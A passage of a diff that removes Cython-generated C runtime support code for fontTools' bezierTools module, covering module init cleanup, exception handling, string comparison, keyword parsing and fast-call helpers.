__pyx_filename); - } - #if !CYTHON_USE_MODULE_STATE - Py_CLEAR(__pyx_m); - #else - Py_DECREF(__pyx_m); - if (pystate_addmodule_run) { - PyObject *tp, *value, *tb; - PyErr_Fetch(&tp, &value, &tb); - PyState_RemoveModule(&__pyx_moduledef); - PyErr_Restore(tp, value, tb); - } - #endif - } else if (!PyErr_Occurred()) { - PyErr_SetString(PyExc_ImportError, "init fontTools.misc.bezierTools"); - } - __pyx_L0:; - __Pyx_RefNannyFinishContext(); - #if CYTHON_PEP489_MULTI_PHASE_INIT - return (__pyx_m != NULL) ? 
0 : -1; - #elif PY_MAJOR_VERSION >= 3 - return __pyx_m; - #else - return; - #endif -} -/* #### Code section: cleanup_globals ### */ -/* #### Code section: cleanup_module ### */ -/* #### Code section: main_method ### */ -/* #### Code section: utility_code_pragmas ### */ -#ifdef _MSC_VER -#pragma warning( push ) -/* Warning 4127: conditional expression is constant - * Cython uses constant conditional expressions to allow in inline functions to be optimized at - * compile-time, so this warning is not useful - */ -#pragma warning( disable : 4127 ) -#endif - - - -/* #### Code section: utility_code_def ### */ - -/* --- Runtime support code --- */ -/* Refnanny */ -#if CYTHON_REFNANNY -static __Pyx_RefNannyAPIStruct *__Pyx_RefNannyImportAPI(const char *modname) { - PyObject *m = NULL, *p = NULL; - void *r = NULL; - m = PyImport_ImportModule(modname); - if (!m) goto end; - p = PyObject_GetAttrString(m, "RefNannyAPI"); - if (!p) goto end; - r = PyLong_AsVoidPtr(p); -end: - Py_XDECREF(p); - Py_XDECREF(m); - return (__Pyx_RefNannyAPIStruct *)r; -} -#endif - -/* PyErrExceptionMatches */ -#if CYTHON_FAST_THREAD_STATE -static int __Pyx_PyErr_ExceptionMatchesTuple(PyObject *exc_type, PyObject *tuple) { - Py_ssize_t i, n; - n = PyTuple_GET_SIZE(tuple); -#if PY_MAJOR_VERSION >= 3 - for (i=0; i<n; i++) { - if (exc_type == PyTuple_GET_ITEM(tuple, i)) return 1; - } -#endif - for (i=0; i<n; i++) { - if (__Pyx_PyErr_GivenExceptionMatches(exc_type, PyTuple_GET_ITEM(tuple, i))) return 1; - } - return 0; -} -static CYTHON_INLINE int __Pyx_PyErr_ExceptionMatchesInState(PyThreadState* tstate, PyObject* err) { - int result; - PyObject *exc_type; -#if PY_VERSION_HEX >= 0x030C00A6 - PyObject *current_exception = tstate->current_exception; - if (unlikely(!current_exception)) return 0; - exc_type = (PyObject*) Py_TYPE(current_exception); - if (exc_type == err) return 1; -#else - exc_type = tstate->curexc_type; - if (exc_type == err) return 1; - if (unlikely(!exc_type)) return 0; -#endif - #if CYTHON_AVOID_BORROWED_REFS - Py_INCREF(exc_type); - #endif - if (unlikely(PyTuple_Check(err))) { - result = __Pyx_PyErr_ExceptionMatchesTuple(exc_type, err); - } else { - result = __Pyx_PyErr_GivenExceptionMatches(exc_type, err); - } - #if CYTHON_AVOID_BORROWED_REFS - Py_DECREF(exc_type); - #endif - return result; -} -#endif - -/* PyErrFetchRestore */ -#if
CYTHON_FAST_THREAD_STATE -static CYTHON_INLINE void __Pyx_ErrRestoreInState(PyThreadState *tstate, PyObject *type, PyObject *value, PyObject *tb) { -#if PY_VERSION_HEX >= 0x030C00A6 - PyObject *tmp_value; - assert(type == NULL || (value != NULL && type == (PyObject*) Py_TYPE(value))); - if (value) { - #if CYTHON_COMPILING_IN_CPYTHON - if (unlikely(((PyBaseExceptionObject*) value)->traceback != tb)) - #endif - PyException_SetTraceback(value, tb); - } - tmp_value = tstate->current_exception; - tstate->current_exception = value; - Py_XDECREF(tmp_value); - Py_XDECREF(type); - Py_XDECREF(tb); -#else - PyObject *tmp_type, *tmp_value, *tmp_tb; - tmp_type = tstate->curexc_type; - tmp_value = tstate->curexc_value; - tmp_tb = tstate->curexc_traceback; - tstate->curexc_type = type; - tstate->curexc_value = value; - tstate->curexc_traceback = tb; - Py_XDECREF(tmp_type); - Py_XDECREF(tmp_value); - Py_XDECREF(tmp_tb); -#endif -} -static CYTHON_INLINE void __Pyx_ErrFetchInState(PyThreadState *tstate, PyObject **type, PyObject **value, PyObject **tb) { -#if PY_VERSION_HEX >= 0x030C00A6 - PyObject* exc_value; - exc_value = tstate->current_exception; - tstate->current_exception = 0; - *value = exc_value; - *type = NULL; - *tb = NULL; - if (exc_value) { - *type = (PyObject*) Py_TYPE(exc_value); - Py_INCREF(*type); - #if CYTHON_COMPILING_IN_CPYTHON - *tb = ((PyBaseExceptionObject*) exc_value)->traceback; - Py_XINCREF(*tb); - #else - *tb = PyException_GetTraceback(exc_value); - #endif - } -#else - *type = tstate->curexc_type; - *value = tstate->curexc_value; - *tb = tstate->curexc_traceback; - tstate->curexc_type = 0; - tstate->curexc_value = 0; - tstate->curexc_traceback = 0; -#endif -} -#endif - -/* PyObjectGetAttrStr */ -#if CYTHON_USE_TYPE_SLOTS -static CYTHON_INLINE PyObject* __Pyx_PyObject_GetAttrStr(PyObject* obj, PyObject* attr_name) { - PyTypeObject* tp = Py_TYPE(obj); - if (likely(tp->tp_getattro)) - return tp->tp_getattro(obj, attr_name); -#if PY_MAJOR_VERSION < 3 - if 
(likely(tp->tp_getattr)) - return tp->tp_getattr(obj, PyString_AS_STRING(attr_name)); -#endif - return PyObject_GetAttr(obj, attr_name); -} -#endif - -/* PyObjectGetAttrStrNoError */ -static void __Pyx_PyObject_GetAttrStr_ClearAttributeError(void) { - __Pyx_PyThreadState_declare - __Pyx_PyThreadState_assign - if (likely(__Pyx_PyErr_ExceptionMatches(PyExc_AttributeError))) - __Pyx_PyErr_Clear(); -} -static CYTHON_INLINE PyObject* __Pyx_PyObject_GetAttrStrNoError(PyObject* obj, PyObject* attr_name) { - PyObject *result; -#if CYTHON_COMPILING_IN_CPYTHON && CYTHON_USE_TYPE_SLOTS && PY_VERSION_HEX >= 0x030700B1 - PyTypeObject* tp = Py_TYPE(obj); - if (likely(tp->tp_getattro == PyObject_GenericGetAttr)) { - return _PyObject_GenericGetAttrWithDict(obj, attr_name, NULL, 1); - } -#endif - result = __Pyx_PyObject_GetAttrStr(obj, attr_name); - if (unlikely(!result)) { - __Pyx_PyObject_GetAttrStr_ClearAttributeError(); - } - return result; -} - -/* GetBuiltinName */ -static PyObject *__Pyx_GetBuiltinName(PyObject *name) { - PyObject* result = __Pyx_PyObject_GetAttrStrNoError(__pyx_b, name); - if (unlikely(!result) && !PyErr_Occurred()) { - PyErr_Format(PyExc_NameError, -#if PY_MAJOR_VERSION >= 3 - "name '%U' is not defined", name); -#else - "name '%.200s' is not defined", PyString_AS_STRING(name)); -#endif - } - return result; -} - -/* TupleAndListFromArray */ -#if CYTHON_COMPILING_IN_CPYTHON -static CYTHON_INLINE void __Pyx_copy_object_array(PyObject *const *CYTHON_RESTRICT src, PyObject** CYTHON_RESTRICT dest, Py_ssize_t length) { - PyObject *v; - Py_ssize_t i; - for (i = 0; i < length; i++) { - v = dest[i] = src[i]; - Py_INCREF(v); - } -} -static CYTHON_INLINE PyObject * -__Pyx_PyTuple_FromArray(PyObject *const *src, Py_ssize_t n) -{ - PyObject *res; - if (n <= 0) { - Py_INCREF(__pyx_empty_tuple); - return __pyx_empty_tuple; - } - res = PyTuple_New(n); - if (unlikely(res == NULL)) return NULL; - __Pyx_copy_object_array(src, ((PyTupleObject*)res)->ob_item, n); - return res; 
-} -static CYTHON_INLINE PyObject * -__Pyx_PyList_FromArray(PyObject *const *src, Py_ssize_t n) -{ - PyObject *res; - if (n <= 0) { - return PyList_New(0); - } - res = PyList_New(n); - if (unlikely(res == NULL)) return NULL; - __Pyx_copy_object_array(src, ((PyListObject*)res)->ob_item, n); - return res; -} -#endif - -/* BytesEquals */ -static CYTHON_INLINE int __Pyx_PyBytes_Equals(PyObject* s1, PyObject* s2, int equals) { -#if CYTHON_COMPILING_IN_PYPY || CYTHON_COMPILING_IN_LIMITED_API - return PyObject_RichCompareBool(s1, s2, equals); -#else - if (s1 == s2) { - return (equals == Py_EQ); - } else if (PyBytes_CheckExact(s1) & PyBytes_CheckExact(s2)) { - const char *ps1, *ps2; - Py_ssize_t length = PyBytes_GET_SIZE(s1); - if (length != PyBytes_GET_SIZE(s2)) - return (equals == Py_NE); - ps1 = PyBytes_AS_STRING(s1); - ps2 = PyBytes_AS_STRING(s2); - if (ps1[0] != ps2[0]) { - return (equals == Py_NE); - } else if (length == 1) { - return (equals == Py_EQ); - } else { - int result; -#if CYTHON_USE_UNICODE_INTERNALS && (PY_VERSION_HEX < 0x030B0000) - Py_hash_t hash1, hash2; - hash1 = ((PyBytesObject*)s1)->ob_shash; - hash2 = ((PyBytesObject*)s2)->ob_shash; - if (hash1 != hash2 && hash1 != -1 && hash2 != -1) { - return (equals == Py_NE); - } -#endif - result = memcmp(ps1, ps2, (size_t)length); - return (equals == Py_EQ) ? 
(result == 0) : (result != 0); - } - } else if ((s1 == Py_None) & PyBytes_CheckExact(s2)) { - return (equals == Py_NE); - } else if ((s2 == Py_None) & PyBytes_CheckExact(s1)) { - return (equals == Py_NE); - } else { - int result; - PyObject* py_result = PyObject_RichCompare(s1, s2, equals); - if (!py_result) - return -1; - result = __Pyx_PyObject_IsTrue(py_result); - Py_DECREF(py_result); - return result; - } -#endif -} - -/* UnicodeEquals */ -static CYTHON_INLINE int __Pyx_PyUnicode_Equals(PyObject* s1, PyObject* s2, int equals) { -#if CYTHON_COMPILING_IN_PYPY || CYTHON_COMPILING_IN_LIMITED_API - return PyObject_RichCompareBool(s1, s2, equals); -#else -#if PY_MAJOR_VERSION < 3 - PyObject* owned_ref = NULL; -#endif - int s1_is_unicode, s2_is_unicode; - if (s1 == s2) { - goto return_eq; - } - s1_is_unicode = PyUnicode_CheckExact(s1); - s2_is_unicode = PyUnicode_CheckExact(s2); -#if PY_MAJOR_VERSION < 3 - if ((s1_is_unicode & (!s2_is_unicode)) && PyString_CheckExact(s2)) { - owned_ref = PyUnicode_FromObject(s2); - if (unlikely(!owned_ref)) - return -1; - s2 = owned_ref; - s2_is_unicode = 1; - } else if ((s2_is_unicode & (!s1_is_unicode)) && PyString_CheckExact(s1)) { - owned_ref = PyUnicode_FromObject(s1); - if (unlikely(!owned_ref)) - return -1; - s1 = owned_ref; - s1_is_unicode = 1; - } else if (((!s2_is_unicode) & (!s1_is_unicode))) { - return __Pyx_PyBytes_Equals(s1, s2, equals); - } -#endif - if (s1_is_unicode & s2_is_unicode) { - Py_ssize_t length; - int kind; - void *data1, *data2; - if (unlikely(__Pyx_PyUnicode_READY(s1) < 0) || unlikely(__Pyx_PyUnicode_READY(s2) < 0)) - return -1; - length = __Pyx_PyUnicode_GET_LENGTH(s1); - if (length != __Pyx_PyUnicode_GET_LENGTH(s2)) { - goto return_ne; - } -#if CYTHON_USE_UNICODE_INTERNALS - { - Py_hash_t hash1, hash2; - #if CYTHON_PEP393_ENABLED - hash1 = ((PyASCIIObject*)s1)->hash; - hash2 = ((PyASCIIObject*)s2)->hash; - #else - hash1 = ((PyUnicodeObject*)s1)->hash; - hash2 = ((PyUnicodeObject*)s2)->hash; - #endif - if 
(hash1 != hash2 && hash1 != -1 && hash2 != -1) { - goto return_ne; - } - } -#endif - kind = __Pyx_PyUnicode_KIND(s1); - if (kind != __Pyx_PyUnicode_KIND(s2)) { - goto return_ne; - } - data1 = __Pyx_PyUnicode_DATA(s1); - data2 = __Pyx_PyUnicode_DATA(s2); - if (__Pyx_PyUnicode_READ(kind, data1, 0) != __Pyx_PyUnicode_READ(kind, data2, 0)) { - goto return_ne; - } else if (length == 1) { - goto return_eq; - } else { - int result = memcmp(data1, data2, (size_t)(length * kind)); - #if PY_MAJOR_VERSION < 3 - Py_XDECREF(owned_ref); - #endif - return (equals == Py_EQ) ? (result == 0) : (result != 0); - } - } else if ((s1 == Py_None) & s2_is_unicode) { - goto return_ne; - } else if ((s2 == Py_None) & s1_is_unicode) { - goto return_ne; - } else { - int result; - PyObject* py_result = PyObject_RichCompare(s1, s2, equals); - #if PY_MAJOR_VERSION < 3 - Py_XDECREF(owned_ref); - #endif - if (!py_result) - return -1; - result = __Pyx_PyObject_IsTrue(py_result); - Py_DECREF(py_result); - return result; - } -return_eq: - #if PY_MAJOR_VERSION < 3 - Py_XDECREF(owned_ref); - #endif - return (equals == Py_EQ); -return_ne: - #if PY_MAJOR_VERSION < 3 - Py_XDECREF(owned_ref); - #endif - return (equals == Py_NE); -#endif -} - -/* fastcall */ -#if CYTHON_METH_FASTCALL -static CYTHON_INLINE PyObject * __Pyx_GetKwValue_FASTCALL(PyObject *kwnames, PyObject *const *kwvalues, PyObject *s) -{ - Py_ssize_t i, n = PyTuple_GET_SIZE(kwnames); - for (i = 0; i < n; i++) - { - if (s == PyTuple_GET_ITEM(kwnames, i)) return kwvalues[i]; - } - for (i = 0; i < n; i++) - { - int eq = __Pyx_PyUnicode_Equals(s, PyTuple_GET_ITEM(kwnames, i), Py_EQ); - if (unlikely(eq != 0)) { - if (unlikely(eq < 0)) return NULL; // error - return kwvalues[i]; - } - } - return NULL; // not found (no exception set) -} -#endif - -/* RaiseArgTupleInvalid */ -static void __Pyx_RaiseArgtupleInvalid( - const char* func_name, - int exact, - Py_ssize_t num_min, - Py_ssize_t num_max, - Py_ssize_t num_found) -{ - Py_ssize_t num_expected; - 
const char *more_or_less; - if (num_found < num_min) { - num_expected = num_min; - more_or_less = "at least"; - } else { - num_expected = num_max; - more_or_less = "at most"; - } - if (exact) { - more_or_less = "exactly"; - } - PyErr_Format(PyExc_TypeError, - "%.200s() takes %.8s %" CYTHON_FORMAT_SSIZE_T "d positional argument%.1s (%" CYTHON_FORMAT_SSIZE_T "d given)", - func_name, more_or_less, num_expected, - (num_expected == 1) ? "" : "s", num_found); -} - -/* RaiseDoubleKeywords */ -static void __Pyx_RaiseDoubleKeywordsError( - const char* func_name, - PyObject* kw_name) -{ - PyErr_Format(PyExc_TypeError, - #if PY_MAJOR_VERSION >= 3 - "%s() got multiple values for keyword argument '%U'", func_name, kw_name); - #else - "%s() got multiple values for keyword argument '%s'", func_name, - PyString_AsString(kw_name)); - #endif -} - -/* ParseKeywords */ -static int __Pyx_ParseOptionalKeywords( - PyObject *kwds, - PyObject *const *kwvalues, - PyObject **argnames[], - PyObject *kwds2, - PyObject *values[], - Py_ssize_t num_pos_args, - const char* function_name) -{ - PyObject *key = 0, *value = 0; - Py_ssize_t pos = 0; - PyObject*** name; - PyObject*** first_kw_arg = argnames + num_pos_args; - int kwds_is_tuple = CYTHON_METH_FASTCALL && likely(PyTuple_Check(kwds)); - while (1) { - Py_XDECREF(key); key = NULL; - Py_XDECREF(value); value = NULL; - if (kwds_is_tuple) { - Py_ssize_t size; -#if CYTHON_ASSUME_SAFE_MACROS - size = PyTuple_GET_SIZE(kwds); -#else - size = PyTuple_Size(kwds); - if (size < 0) goto bad; -#endif - if (pos >= size) break; -#if CYTHON_AVOID_BORROWED_REFS - key = __Pyx_PySequence_ITEM(kwds, pos); - if (!key) goto bad; -#elif CYTHON_ASSUME_SAFE_MACROS - key = PyTuple_GET_ITEM(kwds, pos); -#else - key = PyTuple_GetItem(kwds, pos); - if (!key) goto bad; -#endif - value = kwvalues[pos]; - pos++; - } - else - { - if (!PyDict_Next(kwds, &pos, &key, &value)) break; -#if CYTHON_AVOID_BORROWED_REFS - Py_INCREF(key); -#endif - } - name = first_kw_arg; - while 
(*name && (**name != key)) name++; - if (*name) { - values[name-argnames] = value; -#if CYTHON_AVOID_BORROWED_REFS - Py_INCREF(value); // transfer ownership of value to values - Py_DECREF(key); -#endif - key = NULL; - value = NULL; - continue; - } -#if !CYTHON_AVOID_BORROWED_REFS - Py_INCREF(key); -#endif - Py_INCREF(value); - name = first_kw_arg; - #if PY_MAJOR_VERSION < 3 - if (likely(PyString_Check(key))) { - while (*name) { - if ((CYTHON_COMPILING_IN_PYPY || PyString_GET_SIZE(**name) == PyString_GET_SIZE(key)) - && _PyString_Eq(**name, key)) { - values[name-argnames] = value; -#if CYTHON_AVOID_BORROWED_REFS - value = NULL; // ownership transferred to values -#endif - break; - } - name++; - } - if (*name) continue; - else { - PyObject*** argname = argnames; - while (argname != first_kw_arg) { - if ((**argname == key) || ( - (CYTHON_COMPILING_IN_PYPY || PyString_GET_SIZE(**argname) == PyString_GET_SIZE(key)) - && _PyString_Eq(**argname, key))) { - goto arg_passed_twice; - } - argname++; - } - } - } else - #endif - if (likely(PyUnicode_Check(key))) { - while (*name) { - int cmp = ( - #if !CYTHON_COMPILING_IN_PYPY && PY_MAJOR_VERSION >= 3 - (__Pyx_PyUnicode_GET_LENGTH(**name) != __Pyx_PyUnicode_GET_LENGTH(key)) ? 1 : - #endif - PyUnicode_Compare(**name, key) - ); - if (cmp < 0 && unlikely(PyErr_Occurred())) goto bad; - if (cmp == 0) { - values[name-argnames] = value; -#if CYTHON_AVOID_BORROWED_REFS - value = NULL; // ownership transferred to values -#endif - break; - } - name++; - } - if (*name) continue; - else { - PyObject*** argname = argnames; - while (argname != first_kw_arg) { - int cmp = (**argname == key) ? 0 : - #if !CYTHON_COMPILING_IN_PYPY && PY_MAJOR_VERSION >= 3 - (__Pyx_PyUnicode_GET_LENGTH(**argname) != __Pyx_PyUnicode_GET_LENGTH(key)) ? 
1 : - #endif - PyUnicode_Compare(**argname, key); - if (cmp < 0 && unlikely(PyErr_Occurred())) goto bad; - if (cmp == 0) goto arg_passed_twice; - argname++; - } - } - } else - goto invalid_keyword_type; - if (kwds2) { - if (unlikely(PyDict_SetItem(kwds2, key, value))) goto bad; - } else { - goto invalid_keyword; - } - } - Py_XDECREF(key); - Py_XDECREF(value); - return 0; -arg_passed_twice: - __Pyx_RaiseDoubleKeywordsError(function_name, key); - goto bad; -invalid_keyword_type: - PyErr_Format(PyExc_TypeError, - "%.200s() keywords must be strings", function_name); - goto bad; -invalid_keyword: - #if PY_MAJOR_VERSION < 3 - PyErr_Format(PyExc_TypeError, - "%.200s() got an unexpected keyword argument '%.200s'", - function_name, PyString_AsString(key)); - #else - PyErr_Format(PyExc_TypeError, - "%s() got an unexpected keyword argument '%U'", - function_name, key); - #endif -bad: - Py_XDECREF(key); - Py_XDECREF(value); - return -1; -} - -/* PyDictVersioning */ -#if CYTHON_USE_DICT_VERSIONS && CYTHON_USE_TYPE_SLOTS -static CYTHON_INLINE PY_UINT64_T __Pyx_get_tp_dict_version(PyObject *obj) { - PyObject *dict = Py_TYPE(obj)->tp_dict; - return likely(dict) ? __PYX_GET_DICT_VERSION(dict) : 0; -} -static CYTHON_INLINE PY_UINT64_T __Pyx_get_object_dict_version(PyObject *obj) { - PyObject **dictptr = NULL; - Py_ssize_t offset = Py_TYPE(obj)->tp_dictoffset; - if (offset) { -#if CYTHON_COMPILING_IN_CPYTHON - dictptr = (likely(offset > 0)) ? (PyObject **) ((char *)obj + offset) : _PyObject_GetDictPtr(obj); -#else - dictptr = _PyObject_GetDictPtr(obj); -#endif - } - return (dictptr && *dictptr) ? 
__PYX_GET_DICT_VERSION(*dictptr) : 0; -} -static CYTHON_INLINE int __Pyx_object_dict_version_matches(PyObject* obj, PY_UINT64_T tp_dict_version, PY_UINT64_T obj_dict_version) { - PyObject *dict = Py_TYPE(obj)->tp_dict; - if (unlikely(!dict) || unlikely(tp_dict_version != __PYX_GET_DICT_VERSION(dict))) - return 0; - return obj_dict_version == __Pyx_get_object_dict_version(obj); -} -#endif - -/* GetModuleGlobalName */ -#if CYTHON_USE_DICT_VERSIONS -static PyObject *__Pyx__GetModuleGlobalName(PyObject *name, PY_UINT64_T *dict_version, PyObject **dict_cached_value) -#else -static CYTHON_INLINE PyObject *__Pyx__GetModuleGlobalName(PyObject *name) -#endif -{ - PyObject *result; -#if !CYTHON_AVOID_BORROWED_REFS -#if CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX >= 0x030500A1 - result = _PyDict_GetItem_KnownHash(__pyx_d, name, ((PyASCIIObject *) name)->hash); - __PYX_UPDATE_DICT_CACHE(__pyx_d, result, *dict_cached_value, *dict_version) - if (likely(result)) { - return __Pyx_NewRef(result); - } else if (unlikely(PyErr_Occurred())) { - return NULL; - } -#elif CYTHON_COMPILING_IN_LIMITED_API - if (unlikely(!__pyx_m)) { - return NULL; - } - result = PyObject_GetAttr(__pyx_m, name); - if (likely(result)) { - return result; - } -#else - result = PyDict_GetItem(__pyx_d, name); - __PYX_UPDATE_DICT_CACHE(__pyx_d, result, *dict_cached_value, *dict_version) - if (likely(result)) { - return __Pyx_NewRef(result); - } -#endif -#else - result = PyObject_GetItem(__pyx_d, name); - __PYX_UPDATE_DICT_CACHE(__pyx_d, result, *dict_cached_value, *dict_version) - if (likely(result)) { - return __Pyx_NewRef(result); - } - PyErr_Clear(); -#endif - return __Pyx_GetBuiltinName(name); -} - -/* PyObjectCall */ -#if CYTHON_COMPILING_IN_CPYTHON -static CYTHON_INLINE PyObject* __Pyx_PyObject_Call(PyObject *func, PyObject *arg, PyObject *kw) { - PyObject *result; - ternaryfunc call = Py_TYPE(func)->tp_call; - if (unlikely(!call)) - return PyObject_Call(func, arg, kw); - if 
(unlikely(Py_EnterRecursiveCall((char*)" while calling a Python object"))) - return NULL; - result = (*call)(func, arg, kw); - Py_LeaveRecursiveCall(); - if (unlikely(!result) && unlikely(!PyErr_Occurred())) { - PyErr_SetString( - PyExc_SystemError, - "NULL result without error in PyObject_Call"); - } - return result; -} -#endif - -/* PyFunctionFastCall */ -#if CYTHON_FAST_PYCALL && !CYTHON_VECTORCALL -static PyObject* __Pyx_PyFunction_FastCallNoKw(PyCodeObject *co, PyObject **args, Py_ssize_t na, - PyObject *globals) { - PyFrameObject *f; - PyThreadState *tstate = __Pyx_PyThreadState_Current; - PyObject **fastlocals; - Py_ssize_t i; - PyObject *result; - assert(globals != NULL); - /* XXX Perhaps we should create a specialized - PyFrame_New() that doesn't take locals, but does - take builtins without sanity checking them. - */ - assert(tstate != NULL); - f = PyFrame_New(tstate, co, globals, NULL); - if (f == NULL) { - return NULL; - } - fastlocals = __Pyx_PyFrame_GetLocalsplus(f); - for (i = 0; i < na; i++) { - Py_INCREF(*args); - fastlocals[i] = *args++; - } - result = PyEval_EvalFrameEx(f,0); - ++tstate->recursion_depth; - Py_DECREF(f); - --tstate->recursion_depth; - return result; -} -static PyObject *__Pyx_PyFunction_FastCallDict(PyObject *func, PyObject **args, Py_ssize_t nargs, PyObject *kwargs) { - PyCodeObject *co = (PyCodeObject *)PyFunction_GET_CODE(func); - PyObject *globals = PyFunction_GET_GLOBALS(func); - PyObject *argdefs = PyFunction_GET_DEFAULTS(func); - PyObject *closure; -#if PY_MAJOR_VERSION >= 3 - PyObject *kwdefs; -#endif - PyObject *kwtuple, **k; - PyObject **d; - Py_ssize_t nd; - Py_ssize_t nk; - PyObject *result; - assert(kwargs == NULL || PyDict_Check(kwargs)); - nk = kwargs ? 
PyDict_Size(kwargs) : 0; - if (unlikely(Py_EnterRecursiveCall((char*)" while calling a Python object"))) { - return NULL; - } - if ( -#if PY_MAJOR_VERSION >= 3 - co->co_kwonlyargcount == 0 && -#endif - likely(kwargs == NULL || nk == 0) && - co->co_flags == (CO_OPTIMIZED | CO_NEWLOCALS | CO_NOFREE)) { - if (argdefs == NULL && co->co_argcount == nargs) { - result = __Pyx_PyFunction_FastCallNoKw(co, args, nargs, globals); - goto done; - } - else if (nargs == 0 && argdefs != NULL - && co->co_argcount == Py_SIZE(argdefs)) { - /* function called with no arguments, but all parameters have - a default value: use default values as arguments .*/ - args = &PyTuple_GET_ITEM(argdefs, 0); - result =__Pyx_PyFunction_FastCallNoKw(co, args, Py_SIZE(argdefs), globals); - goto done; - } - } - if (kwargs != NULL) { - Py_ssize_t pos, i; - kwtuple = PyTuple_New(2 * nk); - if (kwtuple == NULL) { - result = NULL; - goto done; - } - k = &PyTuple_GET_ITEM(kwtuple, 0); - pos = i = 0; - while (PyDict_Next(kwargs, &pos, &k[i], &k[i+1])) { - Py_INCREF(k[i]); - Py_INCREF(k[i+1]); - i += 2; - } - nk = i / 2; - } - else { - kwtuple = NULL; - k = NULL; - } - closure = PyFunction_GET_CLOSURE(func); -#if PY_MAJOR_VERSION >= 3 - kwdefs = PyFunction_GET_KW_DEFAULTS(func); -#endif - if (argdefs != NULL) { - d = &PyTuple_GET_ITEM(argdefs, 0); - nd = Py_SIZE(argdefs); - } - else { - d = NULL; - nd = 0; - } -#if PY_MAJOR_VERSION >= 3 - result = PyEval_EvalCodeEx((PyObject*)co, globals, (PyObject *)NULL, - args, (int)nargs, - k, (int)nk, - d, (int)nd, kwdefs, closure); -#else - result = PyEval_EvalCodeEx(co, globals, (PyObject *)NULL, - args, (int)nargs, - k, (int)nk, - d, (int)nd, closure); -#endif - Py_XDECREF(kwtuple); -done: - Py_LeaveRecursiveCall(); - return result; -} -#endif - -/* PyObjectCallMethO */ -#if CYTHON_COMPILING_IN_CPYTHON -static CYTHON_INLINE PyObject* __Pyx_PyObject_CallMethO(PyObject *func, PyObject *arg) { - PyObject *self, *result; - PyCFunction cfunc; - cfunc = 
__Pyx_CyOrPyCFunction_GET_FUNCTION(func); - self = __Pyx_CyOrPyCFunction_GET_SELF(func); - if (unlikely(Py_EnterRecursiveCall((char*)" while calling a Python object"))) - return NULL; - result = cfunc(self, arg); - Py_LeaveRecursiveCall(); - if (unlikely(!result) && unlikely(!PyErr_Occurred())) { - PyErr_SetString( - PyExc_SystemError, - "NULL result without error in PyObject_Call"); - } - return result; -} -#endif - -/* PyObjectFastCall */ -#if PY_VERSION_HEX < 0x03090000 || CYTHON_COMPILING_IN_LIMITED_API -static PyObject* __Pyx_PyObject_FastCall_fallback(PyObject *func, PyObject **args, size_t nargs, PyObject *kwargs) { - PyObject *argstuple; - PyObject *result = 0; - size_t i; - argstuple = PyTuple_New((Py_ssize_t)nargs); - if (unlikely(!argstuple)) return NULL; - for (i = 0; i < nargs; i++) { - Py_INCREF(args[i]); - if (__Pyx_PyTuple_SET_ITEM(argstuple, (Py_ssize_t)i, args[i]) < 0) goto bad; - } - result = __Pyx_PyObject_Call(func, argstuple, kwargs); - bad: - Py_DECREF(argstuple); - return result; -} -#endif -static CYTHON_INLINE PyObject* __Pyx_PyObject_FastCallDict(PyObject *func, PyObject **args, size_t _nargs, PyObject *kwargs) { - Py_ssize_t nargs = __Pyx_PyVectorcall_NARGS(_nargs); -#if CYTHON_COMPILING_IN_CPYTHON - if (nargs == 0 && kwargs == NULL) { - if (__Pyx_CyOrPyCFunction_Check(func) && likely( __Pyx_CyOrPyCFunction_GET_FLAGS(func) & METH_NOARGS)) - return __Pyx_PyObject_CallMethO(func, NULL); - } - else if (nargs == 1 && kwargs == NULL) { - if (__Pyx_CyOrPyCFunction_Check(func) && likely( __Pyx_CyOrPyCFunction_GET_FLAGS(func) & METH_O)) - return __Pyx_PyObject_CallMethO(func, args[0]); - } -#endif - #if PY_VERSION_HEX < 0x030800B1 - #if CYTHON_FAST_PYCCALL - if (PyCFunction_Check(func)) { - if (kwargs) { - return _PyCFunction_FastCallDict(func, args, nargs, kwargs); - } else { - return _PyCFunction_FastCallKeywords(func, args, nargs, NULL); - } - } - #if PY_VERSION_HEX >= 0x030700A1 - if (!kwargs && __Pyx_IS_TYPE(func, &PyMethodDescr_Type)) { - 
return _PyMethodDescr_FastCallKeywords(func, args, nargs, NULL); - } - #endif - #endif - #if CYTHON_FAST_PYCALL - if (PyFunction_Check(func)) { - return __Pyx_PyFunction_FastCallDict(func, args, nargs, kwargs); - } - #endif - #endif - if (kwargs == NULL) { - #if CYTHON_VECTORCALL - #if Py_VERSION_HEX < 0x03090000 - vectorcallfunc f = _PyVectorcall_Function(func); - #else - vectorcallfunc f = PyVectorcall_Function(func); - #endif - if (f) { - return f(func, args, (size_t)nargs, NULL); - } - #elif defined(__Pyx_CyFunction_USED) && CYTHON_BACKPORT_VECTORCALL - if (__Pyx_CyFunction_CheckExact(func)) { - __pyx_vectorcallfunc f = __Pyx_CyFunction_func_vectorcall(func); - if (f) return f(func, args, (size_t)nargs, NULL); - } - #endif - } - if (nargs == 0) { - return __Pyx_PyObject_Call(func, __pyx_empty_tuple, kwargs); - } - #if PY_VERSION_HEX >= 0x03090000 && !CYTHON_COMPILING_IN_LIMITED_API - return PyObject_VectorcallDict(func, args, (size_t)nargs, kwargs); - #else - return __Pyx_PyObject_FastCall_fallback(func, args, (size_t)nargs, kwargs); - #endif -} - -/* PyIntBinop */ -#if !CYTHON_COMPILING_IN_PYPY -static PyObject* __Pyx_PyInt_MultiplyCObj(PyObject *op1, PyObject *op2, long intval, int inplace, int zerodivision_check) { - CYTHON_MAYBE_UNUSED_VAR(intval); - CYTHON_MAYBE_UNUSED_VAR(inplace); - CYTHON_UNUSED_VAR(zerodivision_check); - #if PY_MAJOR_VERSION < 3 - if (likely(PyInt_CheckExact(op2))) { - const long a = intval; - long b = PyInt_AS_LONG(op2); - -#ifdef HAVE_LONG_LONG - if (sizeof(PY_LONG_LONG) > sizeof(long)) { - PY_LONG_LONG result = (PY_LONG_LONG)a * (PY_LONG_LONG)b; - return (result >= LONG_MIN && result <= LONG_MAX) ? 
